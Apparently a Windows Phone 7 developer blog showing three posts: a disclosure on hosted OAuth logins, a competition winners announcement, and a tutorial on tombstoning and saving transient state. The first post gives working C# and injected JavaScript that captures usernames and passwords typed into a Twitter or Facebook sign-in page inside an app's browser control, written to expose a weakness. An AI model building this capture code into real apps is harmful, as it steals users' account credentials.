Hack: OAuth security flaw for Windows Phone 7, iPhone and other Mobile platforms

If you’ve ever worked with one of the many social networking sites out there (eg Facebook or Twitter) you’ll be familiar with OAuth (the official documentation is at http://oauth.net/ but most sites have their own documentation too). For integrating these sites into a website OAuth seems to be relatively secure. There are a couple of versions: OAuth 1, which Twitter currently uses and which is a royal pain to implement, and OAuth 2, which Facebook uses. What I’m going to show in this post is just how dangerous OAuth is for rich client applications (ie native applications for desktop and most mobile platforms).

The original intent behind OAuth was good and noble. It stems from the lack of trust that users have in websites that prompt for a set of credentials that they don’t manage. For example, if DodgyWebSite43.com asked for your Facebook credentials you wouldn’t enter them, would you? So the idea is to send the user off to Facebook to authenticate; once authenticated, the user is returned to the original website along with a token that indicates they’re authenticated.

For rich client applications (in this example I’ll use a Windows Phone 7 application, but the point I’m making is in no way an issue with the platform; rather, it is an issue with OAuth as a protocol) the idea is that you display a web browser control (UIWebView if you’re in iOS-land) and direct the user to sign into the social network of your choice. Once they’re signed in, the host application can extract the authenticated token. Again, the idea is that the application isn’t requesting the user’s credentials. In fact, the application shouldn’t be able to access the user’s credentials at any point in the process.

This is where things start to go pear-shaped. Nearly every rich client platform that has a web browser control for rendering web content within an application also allows the host application to interact with that content. In most cases this can be used to invoke JavaScript. With some relatively basic manipulation of the HTML DOM you can easily, and I mean easily, extract any data that the user enters.

I’ll step through how I did this in my Windows Phone 7 application:

Step 1: Create the UI – some basic XAML to display a WebBrowser control

<phone:WebBrowser x:Name="Browser"
                  ScriptNotify="Browser_ScriptNotify"
                  IsScriptEnabled="True"
                  LoadCompleted="Browser_LoadCompleted" />
 

Notes: I’ve enabled scripts by setting IsScriptEnabled to true. I’ve attached an event handler to the LoadCompleted event; this will allow me to interact with the DOM once the page has rendered. I’ve also attached a handler to the ScriptNotify event; this will allow me to send data from JavaScript back out to the host application.

Step 2: Navigate to the login screen

void MainPage_Loaded(object sender, RoutedEventArgs e)
{
    // Facebook OAuth login: eg http://www.facebook.com/dialog/oauth/?response_type=token...
    // Twitter login: eg mobile.twitter.com/session/new
    this.Browser.Navigate(new Uri("http://mobile.twitter.com/session/new"));
}
 

Notes: Running this you’ll see that the browser navigates to the Twitter sign in page – at this point the user is entering their credentials into the Twitter site. However, what they don’t realise is that the application could be sniffing the data they enter.

Step 3: Inject some JavaScript

private void Browser_LoadCompleted(object sender, System.Windows.Navigation.NavigationEventArgs e)
{
    try
    {
        Browser.InvokeScript("eval", "(function(){" +
            // Find all the input fields
            "var fields = document.getElementsByTagName('input');" +
            // Iterate through looking for text and password fields
            "for(var j=0;j<fields.length;j++){" +
                "if(fields[j].type=='text' || fields[j].type=='password'){ " +
                    // Attach event handlers to retrieve the changed values
                    "fields[j].attachEvent('onchange',function(e){" +
                        // Delay the notify call by 50ms (inner double quotes are escaped for the C# string)
                        "setTimeout('(function(){window.external.notify(\"' + e.srcElement.value + '\");})()',50);" +
                    "});" +
            "}} " +
            "})()");
    }
    catch
    {
        // Ignore any errors raised while invoking the script
    }
}
 

Notes: This block of code calls the JavaScript eval method, passing in a parameter that defines an entire JavaScript function. eval will interpret and execute that function; this pretty much allows you to run any JavaScript code you want. Hopefully the comments in the JavaScript are enough for you to work out what it does up until the setTimeout method.

The window.external.notify JavaScript method is how we send data from JavaScript back out to the host WP7 application. When this method is invoked, it raises the ScriptNotify event on the WebBrowser control, passing the method parameter out into the event handler.

You might be asking why we don’t call window.external.notify directly at this point. Unfortunately if you do that you’ll never see the ScriptNotify event raised. I suspect that this is some sort of conflict occurring on the UI thread: the onchange event is raised in JavaScript due to some UI event from the user (eg moving between fields), and this in turn tries to raise the ScriptNotify event on the UI thread of the browser, which is currently locked. Anyhow, we get around this by delaying the window.external.notify method call by 50 milliseconds.

Step 4: User enters username and password

Notes: After each value is entered the ScriptNotify event is raised, passing out the data entered

Step 5: Extract the data returned from JavaScript

private void Browser_ScriptNotify(object sender, NotifyEventArgs e)
{
    // Extract the exported data
    var txt = e.Value;
}
 

Notes: The variable txt holds the exported value from the text or password input field. The application can then do what it likes with those details.

 

When I run this application and enter values, the value of each field I enter text into is exported (see the list of data values below the WebBrowser).

I’ve included this as a working example (don’t forget to unblock the file when you download it):

As you can see, it is super easy for a rich client application to steal a user’s credentials whilst they are logging in via a WebBrowser control. The moral of this story is that OAuth should not be used for rich client applications, and that the social networking sites need to mature and offer a secure mechanism for rich client applications to authenticate against their services without those applications accessing the users’ credentials directly.

Windows Phone 7 LG App Starter Competition: Winners Announced

Firstly, a massive congratulations to everyone who entered both the preliminary concept rounds and the final application round of the Windows Phone 7 LG App Starter Competition. The submissions were all of a very high standard and it is fantastic to see so many applications making use of both device features and the Windows Phone 7 Metro interface design and controls.

I’ve already sent out books to the winners of the concept rounds. As some of these concepts aren’t available in the Marketplace yet, I won’t publish the details of those ideas/apps. If you were one of the winners and want to be recognised, please feel free to comment on this post and provide a link to your application in the Marketplace.

Unfortunately there is only one winner for the LG Optimus 7 device and it goes to….. Clinton Cherry of Cherry Byte Software with his app, Super Size Me.

I love the awesome graphics in this application. Everything from the start tile (which uses transparency to take advantage of the user selected accent colour) to the background image of the panorama has been well designed. Some might find the over-the-top use of colours offensive but I think it makes this app eye catching. The additional use of animations and transitions makes for a great user experience.

Ok, so if you didn’t win, here are a few pointers:

Speed Matters: Everything from the load time of the application through to how your application responds when the user clicks on an element needs to be tweaked for performance. It’s really easy to build an application that is laggy or doesn’t respond to the user. Make use of background threads for processing and work with the performance metrics to get an idea of how your application will perform.

Tombstoning: PLEASE READ THIS POST (Windows Phone 7: Tombstone Frustration), and if tombstoning still doesn’t make sense, feel free to contact me. I’d be happy to go through this feature with you to ensure it’s done correctly.

Consistency: Read and re-read all of the information about the Metro user experience introduced with Windows Phone 7. Think about how these concepts can be applied to your application. Space things out, use consistent colours and fonts, and make use of the standard or toolkit controls.

Workflow: Put yourself in the position of the user and walk through how the application is going to be used. Firstly, as a brand new user and then as a seasoned user. These two scenarios are key to retaining users.
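
To make the Speed Matters pointer a little more concrete, here is a minimal sketch of pushing work onto a background thread with BackgroundWorker. The class name BackgroundSum, its Start method and the summing workload are hypothetical and only stand in for whatever processing your application actually does.

```csharp
using System;
using System.ComponentModel;

// Hypothetical example: sums the numbers 1..upTo away from the calling thread.
public static class BackgroundSum
{
    public static void Start(int upTo, Action<long> onDone)
    {
        var worker = new BackgroundWorker();

        // DoWork runs on a background thread, so the UI thread stays responsive.
        worker.DoWork += (s, e) =>
        {
            int limit = (int)e.Argument;
            long total = 0;
            for (int i = 1; i <= limit; i++)
            {
                total += i;
            }
            e.Result = total;
        };

        // RunWorkerCompleted is raised after DoWork returns; check Error before reading Result.
        worker.RunWorkerCompleted += (s, e) =>
        {
            if (e.Error == null)
            {
                onDone((long)e.Result);
            }
        };

        worker.RunWorkerAsync(upTo);
    }
}
```

When the worker is created on the UI thread of a phone application, the completed callback should arrive back on that thread, so something like BackgroundSum.Start(100, total => ResultText.Text = total.ToString()) could update a control directly (ResultText being an assumed TextBlock on the page).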

Windows Phone 7: Tombstone Frustration

Peter Torr has opened a can of worms by requesting feedback on Tombstoning within Windows Phone 7. Conceptually this isn’t particularly difficult: when your application goes into the background there is a chance that the operating system will terminate the process in order to reclaim system resources. Unfortunately the current implementation in Windows Phone 7 has led to a lot of confusion. Developers don’t know when their application is going to be terminated, restarted, suspended or resumed. As such they’re using trial and error to attempt to predict when their application is going to be terminated. Let’s start with a couple of examples to illustrate this point.

Scenario 1: Application is not terminated
– User starts an application
– User clicks the start button
– User clicks the back button, returning to the same instance of the application

Scenario 2: Application is terminated (tombstoned) and then restarted
– User starts an application
– User clicks the start button
– User clicks on another application (this will terminate the running instance of the first application)
– User clicks the back button (this will terminate the second application, returning the user to Start)
– User clicks the back button again (this will launch a new instance of the first application)

At the moment the behaviour of WP7 is fairly deterministic, which means that with enough trial and error you can determine all of the scenarios under which your application will or won’t be tombstoned. However, the premise of the model is that your application could be tombstoned at any stage whilst it is in the background, to allow the operating system to reclaim resources. I think it was one of the earliest CTPs of WP7 that actually behaved this way, and it was only in the beta that a more deterministic model was imposed. The upshot of this is that you need to anticipate that your application will be tombstoned when it goes into the background. This is NOT to say that you should assume it has been tombstoned; you just need to code for the case where it is tombstoned.

Ok, so how do we deal with tombstoning…. Again, Peter Torr has a couple of things to say about this in his post on handling activating and deactivating events. In this post Peter discusses the different sequences of events that happen when an application is tombstoned versus when it is not. Let me reproduce them here for your pleasure:

Tombstone Case (typical)

  1. Current page gets OnNavigatedFrom
  2. Application gets Deactivated
  3. Process dies
  4. Process starts
  5. Application gets constructed
  6. Application gets Activated
  7. Current page gets constructed
  8. Current page gets OnNavigatedTo

Non-Tombstone Case (Start -> Back)

  1. Current page gets OnNavigatedFrom
  2. Application gets Deactivated
  3. Application gets Activated
  4. Current page gets OnNavigatedTo

Now, since you want to be able to handle both scenarios it would make sense to only work with events/method calls that happen in both cases. The intersection of these two scenarios actually coincides with the Non-tombstone case where there are OnNavigatedFrom, Deactivated, Activated and OnNavigatedTo events/methods. These are the points where you should be doing ALL transient data persistence and restoration.

“Transient data”….. please define! Ok, I typically think of two different types of data within an application. There is persistent data, which is any data the user has saved or that should survive multiple instances of an app (for example a document that the user saves would be persistent data because they’d expect it to be there the next time they run the app). Then there is transient data, which is any information that the user has entered but hasn’t been saved (for example form fields that have been completed but the form hasn’t been submitted). The user would expect transient information to survive through the lifetime of the page. By this I mean that if they navigate off to another application and then return to the original app the transient data would still be on the page. Conversely if they close the page by navigating using the Back button, they’d expect that data to be lost. Similarly if they restarted the app from the Start they would not expect the data to still be there.

So this raises the question: how do we persist transient data? If we saved it to isolated storage then it’s going to behave like persistent data. Luckily Windows Phone 7 has a solution in the form of both application and page level state dictionaries. When an application is launched these dictionaries are empty. You can populate these dictionaries with data (key value pairs) and the data will survive tombstoning. The only difference between the application level dictionary and the page level dictionaries is that the page dictionaries only last for the lifecycle of the page. When the user clicks the back button to close a page, the associated state dictionary is destroyed.
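
Both the application and page state dictionaries are exposed as IDictionary<string, object>, so every read needs a lookup and a cast. The following is a minimal sketch of a helper that wraps that pattern; TransientState, Save and Restore are hypothetical names and not part of the Windows Phone SDK.

```csharp
using System.Collections.Generic;

// Hypothetical helper, not part of the SDK: typed access to a state dictionary.
public static class TransientState
{
    // Store a value under the given key, replacing any existing entry.
    public static void Save<T>(IDictionary<string, object> state, string key, T value)
    {
        state[key] = value;
    }

    // Return the stored value if the key exists and holds a T; otherwise return the fallback.
    public static T Restore<T>(IDictionary<string, object> state, string key, T fallback)
    {
        object raw;
        if (state.TryGetValue(key, out raw) && raw is T)
        {
            return (T)raw;
        }
        return fallback;
    }
}
```

Because the helper only depends on the dictionary interface, the same calls should work against either PhoneApplicationService.Current.State or a page’s State property, for example TransientState.Restore(this.State, "PageData", string.Empty).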

Ok, so that’s starting to make sense, but where’s the best place to save transient state? The answer to this is based on the lifecycle of the data itself. You may have data that is used application wide; in this case you’ll want to persist and restore this data in the application state dictionary in the Deactivated and Activated events. Alternatively, any data that is page specific should be persisted and restored in the state dictionary for that page in the OnNavigatedFrom and OnNavigatedTo methods.

Example time…..

Application Wide Transient State

public string ApplicationWideData { get; set; }
private void Application_Activated(object sender, ActivatedEventArgs e)
{
    object stateData;
    if (PhoneApplicationService.Current.State.TryGetValue("AppWideData", out stateData))
    {
        ApplicationWideData = stateData as string;
    }
}

private void Application_Deactivated(object sender, DeactivatedEventArgs e)
{
    Debug.WriteLine("Application Deactivated");
    PhoneApplicationService.Current.State["AppWideData"] = ApplicationWideData;
}

 

Page Transient State

protected override void OnNavigatedFrom(System.Windows.Navigation.NavigationEventArgs e)
{
    base.OnNavigatedFrom(e);

    this.State["PageData"] = PageData;

    Debug.WriteLine("(Main Page) Navigated From");
}

protected override void OnNavigatedTo(System.Windows.Navigation.NavigationEventArgs e)
{
    base.OnNavigatedTo(e);

    Debug.WriteLine("(Main Page) Navigated To");

    object stateData;
    if (this.State.TryGetValue("PageData", out stateData))
    {
        PageData = stateData as string;
    }
}

In most cases you’re going to want to persist transient information about the page. You should develop pages so that they don’t rely on any page being created or loaded prior to them. Doing this, and making use of the page state dictionary, is by far the easiest way to handle the challenges associated with tombstoning.
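
One way a page might avoid relying on an earlier page is to work out its inputs from only the page state dictionary and the navigation query string. The sketch below assumes a details page that needs an item id; PageStartup, ResolveItemId, the "ItemId" state key and the "id" query parameter are all hypothetical, and the order of precedence is an assumption rather than a rule.

```csharp
using System.Collections.Generic;

// Hypothetical helper: decides which item a page should show without
// depending on another page having left data behind in memory.
public static class PageStartup
{
    public static string ResolveItemId(
        IDictionary<string, object> pageState,
        IDictionary<string, string> queryString)
    {
        // 1. Returning to the page (possibly after tombstoning): use the saved value.
        object saved;
        if (pageState.TryGetValue("ItemId", out saved) && saved is string)
        {
            return (string)saved;
        }

        // 2. First arrival: take the id from the navigation URI, eg /DetailsPage.xaml?id=42
        string fromQuery;
        if (queryString.TryGetValue("id", out fromQuery))
        {
            return fromQuery;
        }

        // 3. Nothing available: the caller has to cope with an empty start.
        return null;
    }
}
```

In OnNavigatedTo this could be called as PageStartup.ResolveItemId(this.State, this.NavigationContext.QueryString), with the page loading whatever it needs from the returned id.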